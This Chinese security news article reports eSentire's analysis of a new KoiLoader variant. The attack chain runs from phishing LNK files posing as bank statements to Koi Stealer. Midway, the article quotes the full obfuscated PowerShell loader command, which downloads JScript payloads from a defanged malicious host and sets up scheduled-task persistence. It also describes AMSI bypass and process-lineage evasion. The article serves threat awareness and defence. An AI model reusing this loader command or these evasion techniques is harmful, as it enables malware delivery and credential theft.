【安全圈】网络威胁升级：新型 KoiLoader 利用 Powershell 脚本规避检测实现恶意软件投放

关键词

网络安全

网络安全研究人员发现了一场复杂的恶意软件攻击活动，其利用了 KoiLoader 的一个新变种，KoiLoader 是一种模块化的有效载荷交付系统，因分发像 Koi Stealer 这样的信息窃取软件而臭名昭著。

这个更新的变种使用嵌入在 Windows 快捷方式（LNK）文件中的 PowerShell 脚本，以绕过传统的检测机制，这显示出攻击方法的一种令人担忧的演变。

这场攻击活动的初始攻击入口涉及模仿金融机构的网络钓鱼电子邮件，用包含恶意 LNK 文件的 ZIP 压缩文件引诱受害者，这些恶意 LNK 文件被标记为银行对账单。

这些文件利用了一个已知的 Windows 漏洞（ZDI-CAN-25373）来隐藏命令行参数，在表面检查时掩盖其恶意意图。

eSentire 的威胁响应部门（TRU）在例行的威胁搜寻行动中首次检测到了这次入侵，观察到了该恶意软件旨在逃避端点检测与响应（EDR）工具的多阶段部署链条。

攻击始于嵌入在 LNK 文件中的一个 PowerShell 命令，该命令会下载两个 JScript 有效载荷（g1siy9wuiiyxnk.js 和 i7z1x5npc.js），以实现持久化并执行进一步的恶意活动。

值得注意的是，威胁行为者使用计划任务来保持执行的连续性，同时改变进程的父进程关系，以模仿合法的系统活动。

该恶意软件的影响不仅限于最初的被攻陷情况，因为 KoiLoader 便于交付 Koi Stealer，Koi Stealer 是一种基于 C# 的信息窃取软件，能够获取凭据、加密货币钱包和敏感文件。

随后的命令与控制（C2）通信使用加密的 HTTP POST 请求来窃取受害者的数据，包括操作系统详细信息、用户名和域名信息。

这场攻击活动表明，攻击者越来越依赖于利用合法二进制文件（LOLBins）和基于脚本的攻击来规避安全控制。

感染机制：PowerShell 和混淆脚本链式攻击

当受害者与 LNK 文件 chase_statement_march.lnk 进行交互时，感染链条就开始了，这会触发一个截断的 PowerShell 命令。

全面分析显示，该命令会将两个 JScript 文件下载到 % ProgramData% 目录，如下所示：

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command $pdw = $env:programdata + ‘\’ + (‘g1siy9wuiiyxnk.js i7z1x5npc’); $getf=’Dow’+’nl’+’oadF’+’ile’; $w2al9zb7lb86ccs0 = New-Object Net.WebClient; $wscs = ‘wscript ‘; $w2al9zb7lb86ccs0.$getf(‘https://casettalecese[.]it/…/hemigastrectomySDur.php’, ‘g1siy9wuiiyxnk.js’);. (‘curl.exe’) -s -o 76mk0ik748fo ‘https://casettalecese[.]it/…/bivalviaGrr.php’; mv 76mk0ik748fo ‘i7z1x5npc.js’;. (‘sc’+’hta’+’s’+’ks’) /create /sc minute /mo 1 /f /tr (“wscript C:\ProgramData\g1siy9wuiiyxnk.js i7z1x5npc”) /tn i7z1x5npc;

第一个 JScript（g1siy9wuiiyxnk.js）会删除初始的计划任务，并通过 svchost.exe 下的 wscript.exe 重新启动有效载荷，以模拟良性活动。

eSentire 的分析师指出，这种技术会干扰基于进程谱系的检测，因为安全工具通常会将 wscript.exe 与用户发起的操作相关联，而不是与系统服务相关联。

辅助脚本（i7z1x5npc.js）会从注册表

（HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid）中检索受害者机器的全局唯一标识符（GUID），生成一个唯一的文件名，并获取两个 PowerShell 脚本：一个用于禁用反恶意软件扫描接口（AMSI）（boomier10qD0.php），另一个（nephralgiaMsy.ps1）用于将 KoiLoader 加载到内存中。

绕过 AMSI 使用了反射代码注入，然后，KoiLoader 的 shellcode 会使用从嵌入资源中获取的异或（XOR）密钥来解密并执行最终的有效载荷。

研究人员强调了它对 API 哈希的使用 —— 这是一种自定义算法，用于解析诸如 FindResourceW 和 LoadResource 等关键函数 —— 以阻碍静态分析。

这种多阶段的攻击方法凸显了对手在滥用合法二进制文件、混淆脚本和使用加密技术以逃避检测方面的手段日益复杂。

建议各组织通过应用程序控制策略（AppLocker）禁用 wscript.exe，监控 PowerShell 的执行日志，并部署基于行为的端点检测与响应（EDR）解决方案来缓解此类威胁。

安全圈

网罗圈内热点 专注网络安全

实时资讯一手掌握！

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧！